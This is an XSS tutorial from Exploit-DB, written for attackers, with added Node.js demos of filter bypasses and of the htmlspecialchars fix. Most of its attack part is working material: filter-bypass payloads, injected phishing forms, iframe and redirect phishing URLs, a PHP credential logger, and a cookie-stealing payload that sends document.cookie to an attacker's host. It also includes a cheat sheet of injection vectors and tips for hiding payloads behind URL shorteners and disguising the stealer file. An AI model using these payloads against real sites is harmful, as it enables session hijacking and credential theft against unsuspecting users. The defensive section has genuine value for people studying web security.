
28/03/2016

Vulnerability Analysis, Security Papers, Exploit Tutorials Part 13646

<|
[___________________________________________________________________________]
|>

[Advanced XSS Knowledge]

written by novaca!ne

<|
[___________________________________________________________________________]
|>
# Author: novaca!ne
# Date: 23.03.2010

.................
Contact: [email protected]
Website: www.novacaine.biz

Artwork by: Vincenzo

Greetz fly out to:

Vincenzo, J0hn.X3r, fred777,
h0yt3r, EasyLaster, td0s,
Lorenz, Montaxx, maoshe, Palme
and freehack.com
.................
....................
Index:
(I]> Introduction.
(II]> What exactly is XSS?
(III]> How to execute XSS commands.
(IV]> Bypass techniques.
(V]> What can we do with XSS?
(VI]> How to fix XSS leakages.
(VII]> Cheat Sheets.
...................

https://www.exploitdb.com/papers/13646/

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(I]> Introduction
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Dear reader, I wrote this whitepaper to sum up everything I know about XSS.
$ It was written to share knowledge; knowledge should be free and available
$ for everyone.
$ You can post and copy this whitepaper as much as you want, but respect the
$ author's copyrights.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(II]> What exactly is XSS?
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ "XSS" is short for "Cross Site Scripting". As you can see from the name, XSS
$ deals with scripting. To be more exact: JavaScript.
$ It's about injecting (almost) any JavaScript (and HTML/CSS)
$ command or script into a website.
$ An XSS flaw comes up every time a website puts the attacker's input into a
$ page without filtering or encoding it.
$ In other words:
$ the attacker injects his malicious script into a website, and the victim's
$ browser just runs the code or script, with the same rights as the website's
$ own scripts.
$ There are 3 types of XSS. I'm going to talk about the 2 most used:
$ Reflected XSS attack:
$ When an attacker injects his malicious script into a search query, a search
$ box, or the end of a URL, and the server echoes it straight back in its
$ response, it's called a reflected XSS attack. It's like throwing a ball
$ against a wall and receiving it back. The victim has to be made to send the
$ crafted request himself, e.g. by clicking a prepared link.
$ Stored XSS attack:
$ Is when an injected XSS script is stored permanently on a website, for example
$ in a guestbook or bulletin board. Stored XSS hits everyone who just visits
$ the page containing the malicious code, no prepared link needed.
$ DOM based XSS:
$ This is a rarely used method: the injection happens inside the page's own
$ client-side JavaScript (for example a script that writes part of the URL
$ into the document), so the payload may never be seen by the server at all.
$ Perhaps I'm going to write another whitepaper about DOM based XSS attacks.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(III]> How to execute XSS commands
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Actually, injecting an XSS script is very easy. To check if the target
$ website is vulnerable, just look out for a search box or anything else that
$ reflects what you type.
$ Let's say this is what a simple, unsecured search function looks like:
content of index.html
<html>
<head>
<title>Google</title>
</head>
<body>

<form method="get" action="google.php">
Google:
<input type="text" name="search" size="20" />
<input type="submit" class="button" value="Submit" />
</form>

</body>
</html>
content of google.php
<?php echo $_GET['search']; ?>
# I'm going to use this script as the example for the rest of this paper #
$ Let's say this script is stored on a webspace. When I type in:
$ 123
$ then it leads me to the URL:
http://site.ru/google.php?search=123
$ and shows me
123
$ But now, let's try to inject a simple JavaScript alert message:
<script>alert("turtles");</script>
$ and send it.
$ You can replace "turtles" with any other word you want, and even use ''
$ instead of "", for example:
<script>alert('1234');</script>
$ But I'll keep using "turtles" as the example for the rest of this paper.
$ The target website lets us know it's vulnerable when it prints a popup
$ containing
$ |=========|    |======|
$ | turtles | or | 1234 |
$ |=========|    |======|
$ Instead of the script, we can also inject any simple HTML tag, e.g.:
<h1><font color="#00FF00">I like turtles</font></h1>
$ and send it.
$ You can also paste the code at the end of the URL and visit the site like:
www.site.ru/google.php?search=<script>alert('turtles');</script>
$ or
www.site.ru/google.php?search=<h1><font color="#00FF00">I like turtles</font></h1>
# It's as if the attacker is determining the content of the website. #
$ But even if this doesn't work, there's no reason to worry: it means the
$ website uses filter techniques to avoid XSS flaws. But there are also
$ ways to bypass those filters. How this works, you're going to read in
$ the next chapter.
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(IV]> Bypass techniques
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ There are a lot of ways to bypass XSS filters on websites. I'll list some:
$ 1.) magic_quotes_gpc = On bypass
$ 2.) HEX encoding
$ 3.) Obfuscation
$ 4.) Trying around
$ 1.) magic_quotes_gpc = On is a PHP setting (php.ini).
$ It causes every ' (single quote), " (double quote) and \ (backslash) in
$ GET, POST and cookie data to be escaped with a backslash automatically.
$ It's also a well known method to avoid XSS flaws, although it's exploitable:
$ it only breaks payloads that contain quotes, and a payload without quotes
$ goes straight through.
$ (Note: magic_quotes_gpc was deprecated in PHP 5.3 and removed in PHP 5.4,
$ so you'll only meet it on old installations.)

$ How to bypass it when it's On? Use the JavaScript function called
$ String.fromCharCode(): just convert your text into decimal character codes
$ (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the call.
$ Using "turtles" (without the quote signs) will look like this:

String.fromCharCode(116,117,114,116,108,101,115)

$ Now insert this in your alert script:
www.site.ru/google.php?search=<script>alert(String.fromCharCode(116,117,114,116,108,101,115));</script>
$ (A regular expression literal like alert(/turtles/) needs no quotes either.)
$ 2.) HEX encoding is a useful bypass method, too. What this step really does
$ is percent-encode (URL-encode) your script, so you can't see clearly at
$ first glance what the code will cause. Keep in mind that the browser and
$ PHP decode it before the script echoes it, so this only fools filters that
$ look at the raw, undecoded URL; a filter that runs on $_GET sees the plain
$ text again.
$ This is how
<script>alert(/turtles/);</script>
$ looks encoded in HEX:
www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%

$ 3.) Obfuscation: sometimes website administrators simply put words like
$ "script", "alert()", "''" on the "bad words list". That means, when you
$ search for "script" on the website, it just shows you an error like
$ "you are not allowed to search for this word" or something.
$ But this is a weak protection: you can bypass it by obfuscating
$ your JavaScript code, like:
<sCrIpT>alert('turtles');</ScRiPt>
$ HTML tag names are case-insensitive, so the browser still runs it, but a
$ case-sensitive bad words list no longer matches it.
$ There are nearly unlimited possibilities, but that leads us to the
$ next chapter...
$ 4.) Trying around: sometimes you just have to try around, because every
$ website is secured/unsecured in a different, unique way. Some don't even
$ use cookies, for example. Always keep an eye on the website's source code!
$ Sometimes you need to adjust your XSS script, like:
"><script>alert(/turtles/);</script>
$ You need this sometimes if you injected your code into a search box, e.g.,
$ and it lands inside an HTML attribute: the "> first closes the attribute
$ and the tag it is in, then you start a new tag (<script>...).
$ Anyway, there are lots of different methods to bypass XSS filtration,
$ try around!
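$ The four bypasses above can be checked offline without a target. The following
$ Node.js script is an added example and is not part of the original paper: it
$ builds the fromCharCode, percent-encoded and mixed-case variants of one payload
$ and runs them through two assumed, hypothetical defences, a naive case-sensitive
$ "bad words list" that blocks the <script> tag, and an emulation of
$ magic_quotes_gpc (addslashes on every ' " \). The report shows which variant
$ survives which defence, and that percent-encoding is undone by URL decoding
$ before `echo $_GET['search']` ever sees the value.

```javascript
// Added example, not code from the original paper. BAD_WORDS and the
// "server side" decoding step are assumptions that model the paper's google.php.

// 1.) magic_quotes_gpc bypass: express a string as decimal char codes so the
// payload contains no quote characters at all.
function toFromCharCode(text) {
  const codes = Array.from(text, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(",")})`;
}

// Emulation of PHP's magic_quotes_gpc / addslashes(): every ' " \ gets a
// backslash in front of it. A payload that needs quotes is broken by this.
function magicQuotesGpc(value) {
  return value.replace(/([\\'"])/g, "\\$1");
}

// 2.) "HEX encoding": percent-encode every byte of the payload. The browser and
// PHP decode this before the echo, so it only hides the payload from filters
// (and eyes) that look at the raw, undecoded URL.
function percentEncodeAll(text) {
  return Array.from(Buffer.from(text, "utf8"), (b) =>
    "%" + b.toString(16).toUpperCase().padStart(2, "0")
  ).join("");
}

// 3.) Obfuscation: alternate the case of a tag name, e.g. script -> sCrIpT.
// HTML tag names are case-insensitive; a case-sensitive blacklist is not.
function mixCase(word) {
  return Array.from(word, (ch, i) => (i % 2 ? ch.toUpperCase() : ch.toLowerCase())).join("");
}

// Assumed naive blacklist of the kind chapter IV describes: case-sensitive
// substring match on the <script> tag.
const BAD_WORDS = ["<script", "</script"];
function naiveFilterBlocks(input) {
  return BAD_WORDS.some((w) => input.includes(w));
}

// What `<?php echo $_GET['search']; ?>` actually receives: the URL-decoded value.
function serverSideValue(rawQueryValue) {
  return decodeURIComponent(rawQueryValue);
}

// Run every variant through both defences and report the outcome.
function bypassReport() {
  const tag = mixCase("script"); // "sCrIpT"
  const variants = {
    plain: `<script>alert('turtles');</script>`,
    fromCharCode: `<script>alert(${toFromCharCode("turtles")});</script>`,
    percent: percentEncodeAll(`<script>alert(/turtles/);</script>`),
    mixedCase: `<${tag}>alert(/turtles/);</${tag}>`,
  };
  const report = {};
  for (const [name, raw] of Object.entries(variants)) {
    const decoded = serverSideValue(raw);
    report[name] = {
      raw,
      decoded,
      blockedRaw: naiveFilterBlocks(raw),          // filter applied to the raw URL value
      blockedDecoded: naiveFilterBlocks(decoded),  // filter applied after URL decoding
      survivesMagicQuotes: magicQuotesGpc(decoded) === decoded, // unchanged = still valid JS
    };
  }
  return report;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, r] of Object.entries(bypassReport())) {
    console.log(name, {
      blockedRaw: r.blockedRaw,
      blockedDecoded: r.blockedDecoded,
      survivesMagicQuotes: r.survivesMagicQuotes,
    });
  }
}
```

$ Run it with `node bypass.js`. The plain payload is blocked by the blacklist and
$ mangled by magic quotes; fromCharCode survives magic quotes but not the
$ blacklist; the percent-encoded form slips past a filter on the raw URL but is
$ caught again once the value is decoded; only the mixed-case tag passes both.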

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(V]> What can we do with XSS?
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Till now I showed you how to spawn a JavaScript alert message on a website.
$ But now I'll show you how harmful such an XSS flaw can be for your website.
$ Here are some attack techniques you can do with an XSS flaw:
$ 1.) Inject a phishing script
$ 2.) Iframe phishing
$ 3.) Redirect phishing
$ 4.) Cookie stealing
$ 1.) Phishing script inject: just inject a 'user' and 'password' field in HTML
$ (with the <html> and <body> tags), so that the victim may think he needs
$ to log in to the target site.
$ Here an example:
www.site.ru/google.php?search=<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><body>
<div style="text-align: center;"><form method="POST" action="http://www.phishingsite.ru/phishingscript.php">
Phishing page:<br /><br />Username:<br /><input name="User" />
<br />Password:<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok!" type="submit" />
<br /></form></div></body></html>
content of phishingscript.php
<?php
// The keys must match the form field names exactly; PHP array keys are case-sensitive.
$login = $_POST['User'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username: ' . $login . '<br>' . 'Password: ' . $password . '<br>' . '<br>');
fclose($open);
?>
$ 2.) Iframe phishing: simple thing, just inject an iframe in which your
$ phishing site is embedded.
$ Obviously it needs to look just like the target site.
$ Here an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
$ (Note: height="100%" width="100%" means that the whole window is filled
$ with that iframe.)
$ The target site will show your phishing site in an iframe, and the
$ website's users/victims won't see a difference and log in (if they're
$ foolish enough).
$ 3.) Redirection phishing: also simple, just inject a JavaScript redirection
$ script that leads to your phishing site; of course it needs to look just
$ like the target site.
$ Here an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
$ or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.yourphishingsite.ru">
$ 4.) Cookie stealing: one of the feared things in XSS flaws is the cookie
$ stealing attack. In this method you need to do the following:
$ Place this cookiestealer.php on your host, and then inject a JavaScript
$ with your cookie stealer script embedded on your target website.

content of cookiestealer.php (found it somewhere with Google)
<?php
// $HTTP_GET_VARS is long deprecated (removed in PHP 5.4); $_GET holds the same data.
$cookie = $_GET["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>
$ Save it as cookiestealer.php and create a 'log.txt', and upload both files
$ to your own webspace, in the same directory, and set "chmod 777".
$ Inject the following code into your target website:
http://www.site.ru/google.php?search=<script>location.href='http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
$ Then the victim's cookie (of the target website's user who visited the
$ URL above) should appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. the Live HTTP Headers
$ Firefox addon) and use it.
$ (Caveat: document.cookie only returns cookies that were set without the
$ HttpOnly flag, so a session cookie marked HttpOnly never shows up in
$ log.txt, and a victim who is suddenly redirected off the site will notice.)
$ Obviously you need to replace
http://www.yourphishingsite.ru
$ with the URL of your phishing site.
# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicious.                                              #
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(VI]> How to fix XSS leakages
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ XSS flaws can be very dangerous for your website, even though you can
$ easily secure your own website using the following functions.
##########################################################
#                                                        #
# htmlspecialchars()                                     #
# http://php.net/manual/de/function.htmlspecialchars.php #
#                                                        #
##########################################################
Example usage:
google.php:
<?php echo htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8'); ?>
$ OR
##########################################################
#                                                        #
# htmlentities()                                         #
# http://php.net/manual/de/function.htmlentities.php     #
#                                                        #
##########################################################
Example usage:
google.php:
<?php echo htmlentities($_GET['search'], ENT_QUOTES, 'UTF-8'); ?>
$ What happened? The function simply replaced every special character
$ with a harmless HTML entity.
$ For example, when I enter
<script>alert("turtles");</script>
$ it appears in the page source as
&lt;script&gt;alert(&quot;turtles&quot;);&lt;/script&gt;
$ The browser displays it as the text <script>alert("turtles");</script>,
$ but without any popup, because the <, >, ', " and &
$ turned into &lt;, &gt;, &#039;, &quot; and &amp;
$ The attacker's input has become harmless, unexecutable HTML code.
$ (Two caveats: pass ENT_QUOTES, because without it htmlspecialchars() leaves
$ the single quote alone (that was the default in the PHP versions of 2010),
$ so input reflected inside a single-quoted attribute can still break out.
$ And entity encoding only protects output placed into HTML text or
$ attributes; input reflected inside a <script> block, an event handler or a
$ javascript: URL needs encoding for that context instead.)
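$ To see the fix and its single-quote caveat side by side, here is an added
$ Node.js example that is not part of the original paper. It reimplements
$ htmlspecialchars() in JavaScript (with and without the ENT_QUOTES behaviour),
$ echoes the paper's payload the way google.php does, once raw and once encoded,
$ and then echoes an attribute-breakout payload into a single-quoted attribute.
$ The two page templates and the "what the parser takes as the attribute value"
$ check are assumptions for this demo, not code from the paper or from PHP.

```javascript
// Added example, not code from the original paper. Templates model the paper's
// google.php; the attribute check is a simplification of HTML parsing.

// Mirrors htmlspecialchars(): & < > " always; ' only when quoteSingle is set,
// which is what PHP's ENT_QUOTES flag does (the default before PHP 8.1 did not).
function escapeHtml(value, { quoteSingle = true } = {}) {
  let out = String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
  if (quoteSingle) out = out.replace(/'/g, "&#039;");
  return out;
}

// The paper's vulnerable google.php: raw echo into the page body.
function reflectUnsafe(search) {
  return `<p>You searched for: ${search}</p>`;
}

// The fixed google.php: encoded before it is echoed into HTML text.
function reflectBody(search, opts) {
  return `<p>You searched for: ${escapeHtml(search, opts)}</p>`;
}

// Same input echoed into a single-quoted attribute, a context where the
// single quote matters.
function reflectSingleQuotedAttr(search, opts) {
  return `<input type="text" name="search" value='${escapeHtml(search, opts)}' />`;
}

// Reverse the five entities, i.e. the text a browser would display.
const ENTITIES = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#039;": "'" };
function decodeEntities(html) {
  return html.replace(/&(?:amp|lt|gt|quot|#039);/g, (m) => ENTITIES[m]);
}

// What an HTML parser takes as the value of that single-quoted attribute:
// everything up to the next literal single quote. If that is shorter than the
// input, the input broke out of the attribute.
function parsedSingleQuotedValue(html) {
  const m = html.match(/value='([^']*)'/);
  return m ? decodeEntities(m[1]) : null;
}

// A raw <script tag in the output means the payload will execute as HTML.
function hasScriptTag(html) {
  return /<script/i.test(html);
}

// Worked check with the paper's payload and an attribute-breakout payload.
function fixReport() {
  const bodyPayload = `<script>alert("turtles");</script>`;
  const attrPayload = `' onmouseover='alert(1)`;
  const compat = { quoteSingle: false }; // htmlspecialchars() without ENT_QUOTES
  const quotes = { quoteSingle: true };  // htmlspecialchars() with ENT_QUOTES
  return {
    unsafeBodyExecutes: hasScriptTag(reflectUnsafe(bodyPayload)),
    fixedBodyExecutes: hasScriptTag(reflectBody(bodyPayload, quotes)),
    // the encoded output still displays the original text to the user
    fixedBodyDisplays: decodeEntities(escapeHtml(bodyPayload, quotes)) === bodyPayload,
    // without ENT_QUOTES the ' survives and closes the attribute early
    entCompatAttrBreakout: parsedSingleQuotedValue(reflectSingleQuotedAttr(attrPayload, compat)) !== attrPayload,
    // with ENT_QUOTES the whole input stays inside the attribute value
    entQuotesAttrBreakout: parsedSingleQuotedValue(reflectSingleQuotedAttr(attrPayload, quotes)) !== attrPayload,
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(fixReport());
}
```

$ Run it with `node fix.js`. The body case shows the paper's fix working; the
$ attribute case shows why the ENT_QUOTES flag belongs in the call whenever the
$ value may land inside a single-quoted attribute.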
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(VII]> Cheat Sheets
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Here is the XSS cheat sheet; I got most of these from
http://ha.ckers.org/xss.html.
$ Enjoy.
$ XSS locator (inject it into every parameter, then check the page source to
$ see which of the characters come back unencoded):
'';!--"<XSS>=&{()}
$ Basic script tag loading a remote script:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
$ Image tag with the javascript: directive; without quotes and semicolon; with
$ HTML entities for the quotes; with grave accents (lets you use both quote
$ types inside):
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
$ Malformed IMG tag:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
$ fromCharCode, then decimal HTML character references, decimal without
$ trailing semicolons, and hexadecimal without trailing semicolons:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
$ Embedded encoded tab, newline and carriage return inside "javascript":
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
$ (Note: the javascript: directive in IMG SRC only works in browsers of that
$ era; current browsers don't run it, so test the IMG vectors on the target
$ browser before relying on them.)
#############################################################
#                                                           #
# PROTIP FOR EVERY XSS INJECTION:                           #
# use URL shortener services such as tinyurl.com or bit.ly  #
# to 'hide' your injection, so the victim won't know what's #
# behind that URL.                                          #
#                                                           #
#############################################################
END OF FILE
